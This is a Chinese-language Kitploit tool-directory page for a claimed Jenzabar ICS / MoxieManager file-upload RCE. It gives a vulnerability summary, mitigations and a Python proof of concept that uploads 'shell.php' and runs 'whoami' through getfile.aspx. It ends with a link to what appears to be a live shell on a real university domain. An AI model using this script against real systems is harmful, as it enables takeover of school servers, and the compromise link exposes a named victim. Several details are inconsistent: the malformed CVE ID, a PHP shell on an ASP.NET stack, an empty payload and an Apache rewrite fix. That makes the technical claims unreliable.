Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
ICS-MoxieManager-FileUpload-PoC — CVE-2026-30-03 9.8(严重)Jenzabar ICS + MoxieManager 可能存在 RCE | Kitploit
工具/GitHubGitHub/itsismarcos/ics-moxiemanager-fileupload-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试Payload 开发
GitHubitsismarcos/ics-moxiemanager-fileupload-poc

ICS-MoxieManager-FileUpload-PoC

CVE-2026-30-03 9.8(严重)Jenzabar ICS + MoxieManager 可能存在 RCE

查看仓库
14个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ICS-MoxieManager-RCE-CVE-2026-30-03

CVE-2026-30-03 9.8(严重)Jenzabar ICS + MoxieManager 可能存在 RCE

proff https://www.youtube.com/watch?v=lcfUL6Xx3f4&feature=youtu.be

CVE CVSS 影响 受影响组件 CVE-2026-30-03 9.8(严重) 可能存在 RCE Jenzabar ICS + MoxieManager

Jenzabar ICS 系统所使用的 MoxieManager 组件中存在一个漏洞,可能导致文件上传不当,在特定条件下这些文件可被公开访问,并可能进一步导致远程代码执行(RCE)。 技术描述

该问题由以下原因导致:

上传文件缺乏充分的验证

文件可能通过公开端点暴露:

/ICS/staticpages/getfile.aspx

端点认证控制不一致:

/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx

在特定场景下,上传的文件可能被存储在可访问的目录中,随后可被检索。

影响 任意文件上传 敏感内容暴露 可能的远程代码执行(取决于服务器配置) 系统完全受损

分类 CVSS v3.1:9.8(严重) 向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE-434:无限制文件上传 CWE-284:访问控制不当

PoC 漏洞利用代码

#!/usr/bin/env python3

CVE-2026-30-03 PoC - ICS MoxieManager RCE

import requests

TARGET = "https://example.edu" MOXIE = f"{TARGET}/ICS/UI/Common/Scripts/tinymce/plugins/moxiemanager/api.ashx" UUID = "5d6b24cb-7bfe-4a6b-8581-4426bf0f4101"

1. 上传 PHP Shell

files = {'file': ('shell.php', '', 'application/x-php')} data = {'action': 'upload', 'path': '/1085255', 'csrf': 'E24607903E4DC7496732F267BAD48FF35D855DA9E362AB80E0340D5B5EC5F164'}

r = requests.post(MOXIE, files=files, data=data) print(f"[+] Upload: {r.status_code}")

2. 执行

SHELL = f"{TARGET}/ICS/staticpages/getfile.aspx?target=/moxiemanager/files/users/{UUID}/shell.php" print(f"[+] Shell: {SHELL}?cmd=whoami") print(requests.get(f"{SHELL}?cmd=whoami").text)

受影响系统(已确认 33+ 个)

修复方案 立即处理(缓解措施):

  1. 删除 /moxiemanager/files/users/*/shell.php

  2. 限制 getfile.aspx:

  3. RewriteRule ^/ICS/staticpages/getfile.aspx?target=.*shell.php - [F,L]

  4. 禁用 MoxieManager 上传功能

Prof https://my.rsu.edu/ICS/icsfs/shell.asp?target=61d75719-3a6a-4908-bb5d-3f9a443dd443

下载工具